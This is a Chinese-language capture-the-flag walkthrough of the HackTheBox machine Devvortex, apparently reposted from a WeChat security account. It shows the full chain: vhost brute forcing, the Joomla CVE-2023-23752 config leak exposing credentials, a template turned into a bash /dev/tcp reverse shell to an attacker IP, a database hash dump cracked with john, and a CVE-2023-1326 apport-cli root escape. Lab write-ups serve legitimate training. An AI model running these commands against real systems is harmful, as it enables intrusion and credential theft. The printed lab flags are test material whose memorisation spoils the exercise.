0x01 信息收集
已知IP为:10.10.11.242
使用nmap进行端口扫描,时间充足情况下可以使用-p-参数进行全端口扫描
nmap -sS -T4 10.10.11.242
发现只有22和80web端口存活,浏览器访问IP自动跳转域名,老样子加hosts
0x02 WEB渗透
访问网页,随便点点,看起来是一个静态网页
我们直接扫描一下目录
dirsearch -u http://devvortex.htbdirb http://devvortex.htb
两个工具都好像没有扫描到什么
换个思路去查下源代码,然后好像也没发现啥。。。按照红队思维,突然想到可以试着爆破一下子域名看看有没有什么东西,在kali下爆破子域名可以用gobuster或者subfinder,在暗魂渗透系统可以使用OneForAll
gobuster vhost -u devvortex.htb --append-domain -w /usr/share/wordlists/dirb/others/names.txt//vhost扫描模式用于查找目标网站上查找隐藏主机(因为靶场处于内网和手动解析的情况下),dns扫描模式是dns协议下发现相关子域名,然后--append-domain参数是附加主机名子域
动解析的情况下),dns扫描模式是dns协议下发现相关子域名,然后--append-domain参数是附加主机名子域
扫描后发现隐藏主机:Dev.devvortex.htb,加上hosts后访问,也是一个静态网页
再次扫描目录,看起来挺多东西的
访问administrator目录,发现是个joomla框架
百度搜了一下CVE,发现最新有个CVE-2023-23752未授权访问漏洞,使用poc
http://dev.devvortex.htb/api/index.php/v1/config/application?public=true然后发现了用户名lewis和密码P4ntherg0t1n5r3c0n##
成功登录后台
在后台随便点点,找到了一个模板页面,可以直接修改成webshell。做这些靶场最好还是用反弹shell形式,用日常渗透这些webshell用冰蝎连,到最后还是要拿shell好执行命令。
exec("/bin/bash -c 'sh -i >& /dev/tcp/10.10.14.11/4444 0>&1'");访问:http://dev.devvortex.htb/administrator/templates/atum/error.php
然后提升交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'找到user的flag在logan用户目录下,访问没权限。估计要找下logan用户的密码了
可以翻翻数据库,账号就是上面找到的
show databases; //查找数据库use joomla; //进入数据库joomlashow tables; //查找有哪些表select * from sd4fg_users; //找到用户表sd4fg_users后查所有数据
数据库中找到用户名为logan的数据,然后可以看到密码哈希值
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12可以使用john进行破解,爆破密码得:tequieromucho
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
切换用户logan查看user.txt获得flag:
32dce103190f013b492d5704581ac1c7
0x03 权限提升
sudo -l查看特权文件,发现有个apport-cli
github找到有个CVE-2023-1326的apport-cli提权漏洞:
https://github.com/diego-tella/CVE-2023-1326-PoC不过这个poc好像不能直接操作?
ps:反弹shell中操作命令有点不方便,我这里把他用ssh直接登录logan
看描述中,好像-c指定报告后需要用less?
sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash less输入V!/bin/bash
找到root的flag:
d4698e95910d76632e5a64807cbcd101
完结撒花!
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】HackTheBox靶场之Devvortex
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论